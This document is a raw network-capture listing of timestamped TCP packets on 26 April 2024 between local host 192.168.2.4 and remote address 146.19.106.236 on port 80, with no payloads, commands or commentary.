Apr 26, 2024 23:16:31.179800987 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.179836035 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.179855108 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.179883003 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.179897070 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.179963112 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.180052042 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180071115 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180114031 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.180135012 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180177927 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180223942 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.180237055 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180269957 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180314064 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.180517912 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180535078 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180551052 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180573940 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.180624962 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180643082 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180668116 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.180685043 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.180834055 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.180979013 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.181016922 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.181060076 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.181070089 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.181087971 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.181107044 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.181128025 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.181178093 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.181220055 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.181925058 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.181966066 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.182029963 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.182082891 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.182107925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.182146072 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.182172060 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.182218075 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.182243109 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.182260036 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.182285070 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.182379961 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.182406902 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.236156940 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.338397980 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.339423895 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.339560986 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.340569973 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.342230082 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.342276096 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.342659950 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343108892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343159914 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.343401909 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343442917 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343485117 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343511105 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.343523979 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343566895 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.343568087 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343609095 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343647957 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343687057 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343709946 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.343729019 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343743086 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.343770981 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343810081 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343852043 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343856096 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.343892097 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343895912 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.343930960 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.343970060 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.344010115 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.344017029 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.344050884 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.344085932 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.344657898 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.344850063 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.344863892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.344903946 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.344943047 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.344981909 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.345184088 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345225096 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345227957 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.345263958 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345304966 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345356941 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.345377922 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345417976 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.345449924 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345490932 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345529079 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345534086 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.345571995 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345618010 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.345618963 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345658064 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345698118 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345736980 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345746994 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.345777035 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345783949 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.345815897 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345854044 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.345897913 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.346286058 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346327066 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346343994 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.346364975 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346636057 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346674919 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346678019 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.346713066 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.346714973 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346759081 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346796989 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346837997 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346844912 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.346878052 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346883059 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.346918106 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346959114 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.346997976 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347006083 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347037077 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347043037 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347111940 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347151995 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347157001 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347188950 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347228050 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347266912 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347268105 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347306967 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347320080 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347347975 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347388029 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347425938 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347448111 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347460985 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347464085 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347502947 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347541094 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347578049 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347593069 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347616911 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347620010 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347664118 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347708941 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347742081 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347814083 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347851992 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347867966 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.347892046 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347930908 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347969055 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.347973108 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348010063 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348021984 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348052979 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348093033 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348133087 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348165035 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348207951 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348211050 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348247051 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348284960 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348324060 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348331928 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348361969 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348371029 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348401070 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348438978 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348479033 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348484039 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348517895 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348521948 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348557949 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348599911 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348606110 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348637104 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348675966 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348715067 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348716021 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348754883 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348756075 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348793030 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348830938 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348836899 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348870039 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348908901 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348947048 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348948956 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.348984003 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.348990917 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349021912 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349061966 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349102974 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349106073 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349140882 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349145889 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349180937 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349220037 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349257946 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349261999 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349297047 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349303007 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349337101 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349375010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349414110 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349414110 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349453926 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349459887 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349492073 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349530935 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349572897 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349580050 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349616051 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349617958 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349654913 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349695921 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349731922 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349735022 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349772930 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349777937 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349812031 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349848986 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349849939 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349889040 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349927902 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.349968910 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.349968910 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.350008965 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.350019932 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.350048065 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.350089073 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.350414038 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.350486994 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.350526094 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.350564957 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.350574970 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.350604057 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.350611925 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.350867033 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.351082087 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.351675034 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.351989031 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352044106 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352087021 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352152109 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352190971 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352231026 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352236032 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352272987 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352276087 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352426052 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352490902 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352530956 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352546930 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352575064 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352576971 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352613926 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352650881 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352653027 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352690935 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352730036 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352741003 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352768898 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352808952 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352848053 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352853060 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352884054 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352886915 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352926016 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.352963924 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.352998018 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353053093 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353094101 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353099108 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.353136063 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353178024 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.353209019 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353247881 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353287935 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353327990 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.353487968 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353528023 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353631020 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353658915 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.353668928 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353677034 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.353708029 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353749990 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353787899 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353789091 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.353827953 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353837013 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.353871107 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353909969 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353943110 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.353946924 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353986979 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.353993893 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354026079 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354063988 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354068995 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354104996 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354142904 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354150057 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354182005 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354221106 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354222059 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354264021 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354305983 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354307890 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354379892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354424000 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354424953 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354557991 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354598999 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354607105 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354670048 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354708910 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354716063 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354748011 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354787111 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354825974 CEST	80	49732	146.19.106.236	192.168.2.4
